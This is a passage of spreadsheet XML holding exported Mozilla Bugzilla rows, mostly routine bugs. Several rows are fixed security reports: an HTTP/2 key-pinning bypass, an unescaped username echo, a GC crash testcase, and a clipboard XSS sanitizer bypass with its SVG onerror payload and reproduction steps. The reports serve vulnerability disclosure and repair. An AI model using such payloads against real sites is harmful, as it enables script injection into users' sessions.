      <c r="L5801" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5801" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5801" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5801" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5801" t="inlineStr">
        <is>
          <t>.?</t>
        </is>
      </c>
      <c r="Q5801" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5801" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5801" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5801" t="n">
        <v>1</v>
      </c>
      <c r="U5801" t="n">
        <v>0</v>
      </c>
      <c r="V5801" t="n">
        <v>20</v>
      </c>
      <c r="W5801" t="inlineStr">
        <is>
          <t>Created attachment 8614304
hello-directory-tiles.zip
Ed, please traffic the following
Name of Campaign: Hello_Directory1
Tile Type: Directory Tile
Run Dates: Tues 6/2 - 6/30/2015
Locale: All - en, de, fr, pt, pl, ru, es
URL:
https://www.mozilla.org/firefox/hello/start/?utm_source=directory-tiles&amp;utm_medium=tiles&amp;utm_campaign=sc-2015-hello&amp;utm_content=screen-with-faces
Title: Firefox Hello
Creative: Attached 
hello-directory-tile-A-all - this is the default tile for all locales. Each locale has it's own rollover tile</t>
        </is>
      </c>
      <c r="X5801" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5802">
      <c r="A5802" t="n">
        <v>1417682</v>
      </c>
      <c r="B5802" t="inlineStr">
        <is>
          <t>2017-11-15 14:21:15 -0800</t>
        </is>
      </c>
      <c r="C5802" t="inlineStr">
        <is>
          <t>Backfill sync telemetry data</t>
        </is>
      </c>
      <c r="D5802" t="inlineStr">
        <is>
          <t>2022-07-26 12:18:12 -0700</t>
        </is>
      </c>
      <c r="E5802" t="n">
        <v>1</v>
      </c>
      <c r="F5802" t="n">
        <v>1</v>
      </c>
      <c r="G5802" t="n">
        <v>2</v>
      </c>
      <c r="H5802" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5802" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J5802" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5802" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5802" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5802" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5802" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5802" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5802" t="inlineStr"/>
      <c r="Q5802" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5802" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5802" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5802" t="n">
        <v>1</v>
      </c>
      <c r="U5802" t="n">
        <v>0</v>
      </c>
      <c r="V5802" t="n">
        <v>5</v>
      </c>
      <c r="W5802" t="inlineStr">
        <is>
          <t>Now that bug 1414093, bug 1410152, and bug 1409861 are solved, and we know that bug 1415744 isn't due to an issue with the scala (and the data is simply not reported in the pings), we'd like to run a backfill on the sync data.
After discussion with ADavis and leifoines, 6 months is sufficient.
Sadly, this will require backfilling all three of SyncView, SyncFlatView, and the validation data python code (the last one must be done after SyncView).
The SyncEventView does not need backfilling, since these issues should not effect it.
Let me know if after this is done, I need to file a bug to get the data into redash, or if the existing import setup will pick up the backfilled data automatically.</t>
        </is>
      </c>
      <c r="X5802" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5803">
      <c r="A5803" t="n">
        <v>1438469</v>
      </c>
      <c r="B5803" t="inlineStr">
        <is>
          <t>2018-02-15 02:40:33 -0800</t>
        </is>
      </c>
      <c r="C5803" t="inlineStr">
        <is>
          <t>Intermittent Selenium test_filter_jobs_by_failure_result "AssertionError: assert '' == 'exception'"</t>
        </is>
      </c>
      <c r="D5803" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E5803" t="n">
        <v>1</v>
      </c>
      <c r="F5803" t="n">
        <v>1</v>
      </c>
      <c r="G5803" t="n">
        <v>7</v>
      </c>
      <c r="H5803" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5803" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5803" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K5803" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5803" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5803" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5803" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5803" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5803" t="inlineStr"/>
      <c r="Q5803" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5803" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5803" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5803" t="n">
        <v>1</v>
      </c>
      <c r="U5803" t="n">
        <v>0</v>
      </c>
      <c r="V5803" t="n">
        <v>6</v>
      </c>
      <c r="W5803" t="inlineStr">
        <is>
          <t>I've seen this a handful of times on Travis:
$ pytest tests/selenium/ --driver Firefox
============================= test session starts ==============================
platform linux2 -- Python 2.7.14, pytest-3.4.0, py-1.5.2, pluggy-0.6.0
driver: Firefox
sensitiveurl: mozilla\.org
Django settings: tests.settings (from ini file)
rootdir: /home/travis/build/mozilla/treeherder, inifile: setup.cfg
plugins: variables-1.7.1, selenium-1.11.4, django-3.1.2, base-url-1.4.1
collected 20 items                                                             
tests/selenium/test_filter_jobs_by_failure_result.py F..                 [ 15%]
tests/selenium/test_filter_jobs_by_keywords.py .                         [ 20%]
tests/selenium/test_filter_jobs_by_result_status.py .......              [ 55%]
tests/selenium/test_perfherder.py .                                      [ 60%]
tests/selenium/test_range.py ..                                          [ 70%]
tests/selenium/test_reset_filters.py .                                   [ 75%]
tests/selenium/test_select_unclassified_job.py ..                        [ 85%]
tests/selenium/test_switch_app.py .                                      [ 90%]
tests/selenium/test_switch_repo.py .                                     [ 95%]
tests/selenium/test_view_single_result.py .                              [100%]
=================================== FAILURES ===================================
________________ test_filter_jobs_by_failure_result[testfailed] ________________
base_url = 'http://localhost:38851'
selenium = &lt;selenium.webdriver.firefox.webdriver.WebDriver (session="70922604-c981-48bf-8f95-7276b8237f83")&gt;
test_jobs = None, result = 'exception'
    @pytest.mark.parametrize('result', RESULTS)
    def test_filter_jobs_by_failure_result(base_url, selenium, test_jobs, result):
        page = Treeherder(selenium, base_url).open()
        assert len(page.all_jobs) == len(RESULTS)
        with page.filters_menu() as filters:
            for result in RESULTS:
                getattr(filters, 'toggle_{}_jobs'.format(result))()
        assert len(page.all_jobs) == 0
        with page.filters_menu() as filters:
            getattr(filters, 'toggle_{}_jobs'.format(result))()
        assert len(page.all_jobs) == 1
        page.all_jobs[0].click()
&gt;       assert page.info_panel.job_details.result == result
E       AssertionError: assert '' == 'exception'
E         + exception
tests/selenium/test_filter_jobs_by_failure_result.py:28: AssertionError
------------------------------- pytest-selenium --------------------------------
URL: http://localhost:38851/#/jobs?repo=test_treeherder_jobs&amp;filter-resultStatus=success&amp;filter-resultStatus=retry&amp;filter-resultStatus=usercancel&amp;filter-resultStatus=running&amp;filter-resultStatus=pending&amp;filter-resultStatus=runnable&amp;filter-resultStatus=exception&amp;selectedJob=3
Driver log: /tmp/pytest-of-travis/pytest-0/test_filter_jobs_by_failure_re0/driver.log
WARNING: Failed to gather log types: Message: GET /session/70922604-c981-48bf-8f95-7276b8237f83/log/types did not match a known command
=============================== warnings summary ===============================
tests/selenium/test_filter_jobs_by_failure_result.py::test_filter_jobs_by_failure_result[testfailed]
  /home/travis/venv/lib/python2.7/site-packages/django/db/backends/mysql/base.py:101: Warning: (124L, 'InnoDB rebuilding table to add column FTS_DOC_ID')
    return self.cursor.execute(query, args)
-- Docs: http://doc.pytest.org/en/latest/warnings.html
============== 1 failed, 19 passed, 1 warnings in 137.49 seconds ===============</t>
        </is>
      </c>
      <c r="X5803" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5804">
      <c r="A5804" t="n">
        <v>700087</v>
      </c>
      <c r="B5804" t="inlineStr">
        <is>
          <t>2011-11-05 22:47:16 -0700</t>
        </is>
      </c>
      <c r="C5804" t="inlineStr">
        <is>
          <t>Empty panel is left after deleting last app within it</t>
        </is>
      </c>
      <c r="D5804" t="inlineStr">
        <is>
          <t>2011-12-21 12:29:57 -0800</t>
        </is>
      </c>
      <c r="E5804" t="n">
        <v>1</v>
      </c>
      <c r="F5804" t="n">
        <v>1</v>
      </c>
      <c r="G5804" t="n">
        <v>5</v>
      </c>
      <c r="H5804" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5804" t="inlineStr">
        <is>
          <t>Web Apps</t>
        </is>
      </c>
      <c r="J5804" t="inlineStr">
        <is>
          <t>Dashboard</t>
        </is>
      </c>
      <c r="K5804" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5804" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5804" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N5804" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5804" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5804" t="inlineStr"/>
      <c r="Q5804" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5804" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5804" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5804" t="n">
        <v>1</v>
      </c>
      <c r="U5804" t="n">
        <v>0</v>
      </c>
      <c r="V5804" t="n">
        <v>7</v>
      </c>
      <c r="W5804" t="inlineStr">
        <is>
          <t>Created attachment 572259
Screenshot
Build identifier: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
When the user has many apps installed (and they get multiple tabs/panels within the Dashboard), if they delete the apps from a certain panel/tab, that panel/tab will remain as part of the Dashboard. The panel/tab remains even after a page refresh. However, if the user deletes an app, then the extra panel/tab will disappear. 
Steps to reproduce:
1. Launch Firefox
2. Install the Open Web Apps extension (latest) - The currently latest working extension across all platforms (as of the date this bug is filed) can be found at http://people.mozilla.com/~mdabbagh/openwebapps/extension/openwebapps_01112011.xpi
3. Go to https://apps.mozillalabs.com/appdir/
4. Install 16+ apps (to get 2 panels/tabs within the Dashboard)
5. Go to https://myapps.mozillalabs.com/
6. Delete all the apps from the second panel - This can be done by going to about:apps and deleting the apps from there or by clicking and holding down on an app until the 'X' appears. Then release the mouse and you should be prompted to delete the app.
Expected Results: 
The apps are deleted successfully and the extra panel is removed. Only the first panel that contains apps should be seen. There should only be one point at the bottom of the Dashboard corresponding to the first panel/tab. 
Actual Results:
The second panel that is now empty can still be seen even after a refresh. When the user deletes another app (from the first panel/tab), then the second panel/tab disappears.</t>
        </is>
      </c>
      <c r="X5804" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5805">
      <c r="A5805" t="n">
        <v>1049095</v>
      </c>
      <c r="B5805" t="inlineStr">
        <is>
          <t>2014-08-05 12:47:29 -0700</t>
        </is>
      </c>
      <c r="C5805" t="inlineStr">
        <is>
          <t>Spdy/Http-2 Coalescing Key Pinning Bypass</t>
        </is>
      </c>
      <c r="D5805" t="inlineStr">
        <is>
          <t>2016-06-04 16:02:26 -0700</t>
        </is>
      </c>
      <c r="E5805" t="n">
        <v>1</v>
      </c>
      <c r="F5805" t="n">
        <v>1</v>
      </c>
      <c r="G5805" t="n">
        <v>3</v>
      </c>
      <c r="H5805" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5805" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5805" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K5805" t="inlineStr">
        <is>
          <t>32 Branch</t>
        </is>
      </c>
      <c r="L5805" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5805" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5805" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5805" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5805" t="inlineStr">
        <is>
          <t>[sdpy][adv-main33+]</t>
        </is>
      </c>
      <c r="Q5805" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5805" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5805" t="inlineStr">
        <is>
          <t>mozilla34</t>
        </is>
      </c>
      <c r="T5805" t="n">
        <v>1</v>
      </c>
      <c r="U5805" t="n">
        <v>0</v>
      </c>
      <c r="V5805" t="n">
        <v>48</v>
      </c>
      <c r="W5805" t="inlineStr">
        <is>
          <t>I was informed of a potential key pinning bypass attack that I can confirm we are vulnerable to. The attack uses spdy/h2 connection-coalescing to bypass the key pin.
Assume a.example.com is pinned to key-a and b.example.com is pinned to key-b
1] goto host https://a.example.com/  - it has a cert valid for *.example.com on 1.1.1.1 and uses key-a.. it negotiates a spdy connection that stays alive.
2] ask for https://b.example.com/ - it resolves also to 1.1.1.1. Under the spdy/h2 coalescing rules b can use the spdy connection from step 1 because it is the same host (1.1.1.1) and that connection has a valid cert for b.example.com (it was a wildcard) so it can be "joined"
the problem is that b.example.com/ is dispatched on the connection that used key-a and b is supposed to be pinned to key-b.
Before the "joining" we can just check if the connection from step 1 has a full cert chain that satisfies any pins for b.example.com - unfortunately getting the full cert chain requires some work especially with resumed connections (bug 731478)
Realistically, this is probably not a big problem because the configuration is somewhat non-sensical. If these hosts are really eligible for coalescing (which is being done now on &lt;=ff31 which doesn't have any key pinning checks) then you would expect they would be pinned to the same key.
The inclination between keeler, monica, and myself was to try and get this in 34 and ride the trains with the fix.</t>
        </is>
      </c>
      <c r="X5805" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5806">
      <c r="A5806" t="n">
        <v>1614259</v>
      </c>
      <c r="B5806" t="inlineStr">
        <is>
          <t>2020-02-10 00:34:24 -0800</t>
        </is>
      </c>
      <c r="C5806" t="inlineStr">
        <is>
          <t>Crash in [@ mozilla::dom::Location::CallerSubsumes]</t>
        </is>
      </c>
      <c r="D5806" t="inlineStr">
        <is>
          <t>2020-05-29 14:08:29 -0700</t>
        </is>
      </c>
      <c r="E5806" t="n">
        <v>1</v>
      </c>
      <c r="F5806" t="n">
        <v>1</v>
      </c>
      <c r="G5806" t="n">
        <v>3</v>
      </c>
      <c r="H5806" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5806" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5806" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K5806" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5806" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5806" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5806" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5806" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5806" t="inlineStr">
        <is>
          <t>[fenix]</t>
        </is>
      </c>
      <c r="Q5806" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5806" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5806" t="inlineStr">
        <is>
          <t>mozilla76</t>
        </is>
      </c>
      <c r="T5806" t="n">
        <v>1</v>
      </c>
      <c r="U5806" t="n">
        <v>1</v>
      </c>
      <c r="V5806" t="n">
        <v>24</v>
      </c>
      <c r="W5806" t="inlineStr">
        <is>
          <t>Crashes in nightly on all platforms starting with buildid 20200207035551, on MOZ_DIAGNOSTIC_ASSERT(outer).
This bug is for crash report bp-c5da9903-1745-43d8-b0fd-02c6c0200210.
```
Top 10 frames of crashing thread:
0 xul.dll mozilla::dom::Location::CallerSubsumes dom/base/Location.cpp:622
1 xul.dll mozilla::dom::Location::GetProtocol dom/base/Location.cpp:414
2 xul.dll mozilla::dom::Location_Binding::get_protocol dom/bindings/LocationBinding.cpp:236
3 xul.dll mozilla::dom::binding_detail::GenericGetter&lt;mozilla::dom::binding_detail::MaybeCrossOriginObjectThisPolicy, mozilla::dom::binding_detail::ThrowExceptions&gt; dom/bindings/BindingUtils.cpp:3052
4 xul.dll js::InternalCallOrConstruct js/src/vm/Interpreter.cpp:562
5 xul.dll js::CallGetter js/src/vm/Interpreter.cpp:766
6 xul.dll js::NativeGetProperty js/src/vm/NativeObject.cpp:2631
7 xul.dll JS_ForwardGetPropertyTo js/src/jsapi.cpp:2501
8 xul.dll mozilla::dom::Location_Binding::DOMProxyHandler::get const dom/bindings/LocationBinding.cpp:1556
9 xul.dll static js::Proxy::get js/src/proxy/Proxy.cpp:341
```</t>
        </is>
      </c>
      <c r="X5806" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5807">
      <c r="A5807" t="n">
        <v>1666300</v>
      </c>
      <c r="B5807" t="inlineStr">
        <is>
          <t>2020-09-21 09:35:46 -0700</t>
        </is>
      </c>
      <c r="C5807" t="inlineStr">
        <is>
          <t>XSS via paste and Clipboard API and SVG + image onerror handler</t>
        </is>
      </c>
      <c r="D5807" t="inlineStr">
        <is>
          <t>2024-05-30 10:18:55 -0700</t>
        </is>
      </c>
      <c r="E5807" t="n">
        <v>1</v>
      </c>
      <c r="F5807" t="n">
        <v>1</v>
      </c>
      <c r="G5807" t="n">
        <v>3</v>
      </c>
      <c r="H5807" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5807" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5807" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K5807" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5807" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5807" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5807" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5807" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5807" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main83+][adv-esr78.5+]</t>
        </is>
      </c>
      <c r="Q5807" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5807" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5807" t="inlineStr">
        <is>
          <t>84 Branch</t>
        </is>
      </c>
      <c r="T5807" t="n">
        <v>1</v>
      </c>
      <c r="U5807" t="n">
        <v>0</v>
      </c>
      <c r="V5807" t="n">
        <v>27</v>
      </c>
      <c r="W5807" t="inlineStr">
        <is>
          <t>When fuzzing Firefox clipboard API content sanitization on pasting, I found sanitizer bypass with payload `&lt;svg&gt;&lt;style&gt;&lt;image href=1 onerror=alert(document.domain)&gt;`. When user copy from crafted malicious website, then paste the content, XSS will execute. It leads to universal XSS on latest stable release of Firefox, Firefox 78.3.0esr (64-bit), and Firefox Nightly 82.0a1 (2020-09-20).
## Steps to reproduce:
1. Go to https://sourc7.appspot.com/bugzilla/0447f4d26c48bd8d0526dce173f57b3ac5235b7b.html
2. Click Copy Text
3. Go to https://output.jsbin.com/gocizet/ (TinyMCE Rich Editor form)
4. Paste with Ctrl+V or Right click -&gt; Paste into TinyMCE form
5. XSS will execute [pop alert(document.domain)]</t>
        </is>
      </c>
      <c r="X5807" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5808">
      <c r="A5808" t="n">
        <v>87701</v>
      </c>
      <c r="B5808" t="inlineStr">
        <is>
          <t>2001-06-25 14:57:35 -0700</t>
        </is>
      </c>
      <c r="C5808" t="inlineStr">
        <is>
          <t>Invalid username in bug changes echoed back without being escaped</t>
        </is>
      </c>
      <c r="D5808" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:25 -0800</t>
        </is>
      </c>
      <c r="E5808" t="n">
        <v>1</v>
      </c>
      <c r="F5808" t="n">
        <v>1</v>
      </c>
      <c r="G5808" t="n">
        <v>4</v>
      </c>
      <c r="H5808" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5808" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5808" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K5808" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5808" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5808" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N5808" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5808" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5808" t="inlineStr">
        <is>
          <t>security</t>
        </is>
      </c>
      <c r="Q5808" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5808" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5808" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T5808" t="n">
        <v>1</v>
      </c>
      <c r="U5808" t="n">
        <v>0</v>
      </c>
      <c r="V5808" t="n">
        <v>22</v>
      </c>
      <c r="W5808" t="inlineStr">
        <is>
          <t>Steps to reproduce:
1. Go to bug 33830.
2. Try to add &lt;u&gt;@netscape.com to the CC list.
Result: The name @netscape.com is not a valid username.
                 --------------------------------------
Expected: The name &lt;u&gt;@netscape.com is not a valid username.
This bug happens with all e-mail address fields, not just with CC.  I think it
affects the new-bug form as well as the form for modifying existing bugs.
This is a security hole. Fixing bug 26257 would make the security hole less
exploitable, but it would still be a bug.</t>
        </is>
      </c>
      <c r="X5808" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5809">
      <c r="A5809" t="n">
        <v>1884427</v>
      </c>
      <c r="B5809" t="inlineStr">
        <is>
          <t>2024-03-08 11:25:56 -0800</t>
        </is>
      </c>
      <c r="C5809" t="inlineStr">
        <is>
          <t>Crash [@ js::CheckTracedThing]</t>
        </is>
      </c>
      <c r="D5809" t="inlineStr">
        <is>
          <t>2024-09-18 19:36:50 -0700</t>
        </is>
      </c>
      <c r="E5809" t="n">
        <v>1</v>
      </c>
      <c r="F5809" t="n">
        <v>1</v>
      </c>
      <c r="G5809" t="n">
        <v>3</v>
      </c>
      <c r="H5809" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5809" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5809" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K5809" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5809" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5809" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5809" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5809" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5809" t="inlineStr">
        <is>
          <t>[adv-main125+]</t>
        </is>
      </c>
      <c r="Q5809" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5809" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S5809" t="inlineStr">
        <is>
          <t>126 Branch</t>
        </is>
      </c>
      <c r="T5809" t="n">
        <v>1</v>
      </c>
      <c r="U5809" t="n">
        <v>0</v>
      </c>
      <c r="V5809" t="n">
        <v>20</v>
      </c>
      <c r="W5809" t="inlineStr">
        <is>
          <t>Created attachment 9390239
debug stack
```
gczeal(10);
x = 1;
newGlobal();
oomAtAllocation(8);
try {
  newGlobal();
} catch (e) {}
oomAtAllocation(8);
try {
  newGlobal();
} catch (e) {}
oomAtAllocation(8);
try {
  newGlobal();
} catch (e) {}
newGlobal();
```
```
136	  if (IsForwarded(thing)) {
(gdb) bt
#0  js::CheckTracedThing&lt;JSObject&gt; (trc=trc@entry=0x7fffffffbb38, thing=0xe5e5e5e5e5e5e5e5) at /home/yksubu/trees/mozilla-central/js/src/gc/Marking.cpp:136
#1  0x0000555557c8c134 in js::gc::TraceEdgeInternal (trc=0x7fffffffbb38, thingp=0x7fffffffbb68, Object=&lt;optimized out&gt;) at /home/yksubu/trees/mozilla-central/js/src/gc/Tracer.h:109
#2  js::TraceManuallyBarrieredEdge&lt;JSObject*&gt; (trc=0x7fffffffbb38, thingp=0x7fffffffbb68, name=&lt;optimized out&gt;) at /home/yksubu/trees/mozilla-central/js/src/gc/Tracer.h:252
#3  js::BaseShape::traceChildren (this=0x1bfc73d6e2e0, trc=0x7fffffffbb38) at /home/yksubu/trees/mozilla-central/js/src/gc/TraceMethods-inl.h:305
#4  UpdateCellPointers&lt;js::BaseShape&gt; (trc=0x7fffffffbb38, cell=0x1bfc73d6e2e0) at /home/yksubu/trees/mozilla-central/js/src/gc/Compacting.cpp:497
#5  UpdateArenaPointersTyped&lt;js::BaseShape&gt; (trc=0x7fffffffbb38, arena=0x1bfc73d6e000) at /home/yksubu/trees/mozilla-central/js/src/gc/Compacting.cpp:503
#6  UpdateArenaPointers (trc=0x7fffffffbb38, arena=0x1bfc73d6e000) at /home/yksubu/trees/mozilla-central/js/src/gc/Compacting.cpp:533
#7  UpdateArenaListSegmentPointers (gc=gc@entry=0x7ffff662f798, arenas=...) at /home/yksubu/trees/mozilla-central/js/src/gc/Compacting.cpp:557
#8  0x0000555557c8bb9d in js::gc::GCRuntime::updateCellPointers (this=this@entry=0x7ffff662f798, zone=zone@entry=0x7ffff65b4000, kinds=...) at /home/yksubu/trees/mozilla-central/js/src/gc/Compacting.cpp:676
#9  0x0000555557c86633 in js::gc::GCRuntime::updateAllCellPointers (this=0x7ffff662f798, trc=0x7fffffffc300, zone=0x7ffff65b4000) at /home/yksubu/trees/mozilla-central/js/src/gc/Compacting.cpp:744
#10 js::gc::GCRuntime::updateZonePointersToRelocatedCells (this=this@entry=0x7ffff662f798, zone=zone@entry=0x7ffff65b4000) at /home/yksubu/trees/mozilla-central/js/src/gc/Compacting.cpp:781
/snip
```
Run with `--fuzzing-safe --no-threads --no-baseline --no-ion`, compile with `AR=ar sh ../configure --enable-debug --enable-debug-symbols --with-ccache --enable-nspr-build --enable-ctypes --enable-gczeal --enable-rust-simd --disable-tests`, tested on m-c rev fe38c21e5d5b.
Setting s-s to be safe.</t>
        </is>
      </c>
      <c r="X5809" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5810">
      <c r="A5810" t="n">
        <v>408076</v>
      </c>
      <c r="B5810" t="inlineStr">
        <is>
          <t>2007-12-12 09:21:48 -0800</t>
        </is>
      </c>
      <c r="C5810" t="inlineStr">
        <is>
          <t>out of bounds read in BMP decoder can lead to information disclosure</t>
        </is>
      </c>
      <c r="D5810" t="inlineStr">
        <is>
          <t>2008-03-12 09:27:46 -0700</t>
        </is>
      </c>
      <c r="E5810" t="n">
        <v>1</v>
      </c>
      <c r="F5810" t="n">
        <v>1</v>
      </c>
      <c r="G5810" t="n">
        <v>3</v>
      </c>
      <c r="H5810" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5810" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5810" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K5810" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5810" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5810" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5810" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5810" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5810" t="inlineStr">
        <is>
          <t>[sg:moderate] fix in bug 408256. coordinate disclosure with other vendors, see comment 10</t>
        </is>
      </c>
      <c r="Q5810" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5810" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5810" t="inlineStr">
        <is>
          <t>mozilla1.9beta3</t>
        </is>
      </c>
      <c r="T5810" t="n">
        <v>1</v>
      </c>
      <c r="U5810" t="n">
        <v>0</v>
      </c>
      <c r="V5810" t="n">
        <v>36</v>
      </c>
